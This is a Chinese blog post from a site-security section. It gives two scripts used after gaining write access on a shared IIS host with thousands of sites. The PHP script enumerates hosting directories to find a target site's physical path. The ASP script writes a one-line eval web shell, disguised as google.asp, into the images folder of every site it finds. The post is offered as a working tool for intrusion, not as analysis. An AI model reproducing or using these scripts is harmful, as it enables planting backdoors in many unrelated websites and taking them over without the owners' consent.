一个找二层目录的小东东 – 网站安全 – 自学php

时间: 2020-10-10|tag: 68次围观|0 条评论

碰到个虚拟主机,iis7.0.里边有上万个站,只有脚本权限,没命令行权限,但是可以跨目录写文件.如果能得到目标站的物理目录,能立马搞定.但是想尽一切办法,也没找到物理路径.所以只有用脚本找了.手工找会累死的.一个php是找的,一个asp是写的.

 

<?php

 set_time_limit(0);

$path = 'D:/Hosting';



$somefile = $_GET['key'];

$logfile = 'D:/Hosting/6668835/html/images/ennumdir.txt';





  if (!isset($_SERVER['PHP_AUTH_USER'])) {

    header('WWW-Authenticate: Basic realm="My Realm"');

    header('HTTP/1.0 401 Unauthorized');

    echo 'Text to send if user hits Cancel button';

    exit;

  } else {

    

 

if(is_dir($path) && is_readable($path))

{

$path2 = '';

$handle = opendir($path);

while(false !== ($filename = readdir($handle)))

{

if($filename{0} != $_GET['dir'])

{

continue;

}



/*

if($filename{1} != $_GET['two'])

{

continue;

}

              */



//$path2 = $path.'/'.$filename.'/html';



               $path2 = $path.'/'.$filename;

if(is_dir($path2) && is_readable($path2))

{

@$handle2 = opendir($path2);

while(false !== ($filename2 = readdir($handle2)))

{



if($filename2 == $somefile)

{

//echo'[+]Found !'.$filename2."\n";

file_put_contents($logfile,'[+]Found !'.$path2.'/'.$filename2."\n",FILE_APPEND);

}



}

@closedir($handle2);



}

}

file_put_contents($logfile,'[*]LAST '.$path2."\n",FILE_APPEND);

closedir($handle);

}





   }







<%

Server.ScriptTimeout=500000000

key = Trim(Request.QueryString("key"))

msg=" <% eval(rquese(Chr(35)))%" &">"

Set FSO=Server.CreateObject("Scripting.FileSystemObject")

Set ServerFolder=FSO.GetFolder("C:\intel")

Set ServerFolderList=ServerFolder.subfolders







For Each ServerFileEvery IN ServerFolderList

  

 ' Response.write  ServerFileEvery&"</br>"




If LCase(Left(ServerFileEvery.name, 1)) = LCase(key) Then

Set sServerFolder=FSO.GetFolder(ServerFileEvery)

Set sServerFolderList=sServerFolder.subfolders




For Each sServerFileEvery IN sServerFolderList




If LCase(sServerFileEvery.name) = "images" Then




StreamSaveToFile sServerFileEvery & "\google.asp", msg, "UTF-8"




End If




Next




End If

Next







 Function StreamSaveToFile(sPath, sContent, sCharSet)




Dim oStream




If(InStr(sPath, ":") <= 0)Then

sPath = Replace(sPath, ",", ",")

sPath = Server.MapPath(sPath)

sPath = Replace(sPath, ",", ",")

End If




Set oStream = Server.CreateObject("Adodb.Stream")

With oStream

.Type = 2

.Mode = 3

.Open

.Charset = sCharSet

.WriteText sContent

.SaveToFile sPath, 2

.Close

End With




Set oStream = Nothing




End Function




%>

 
    上一篇: gitbucket1.8版本 关于readme.md的XSS漏洞 - 网站安全

    下一篇: powershell写的一句话管理程序 - 网站安全 - 自学
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《一个找二层目录的小东东 – 网站安全 – 自学php
   

还没有人抢沙发呢~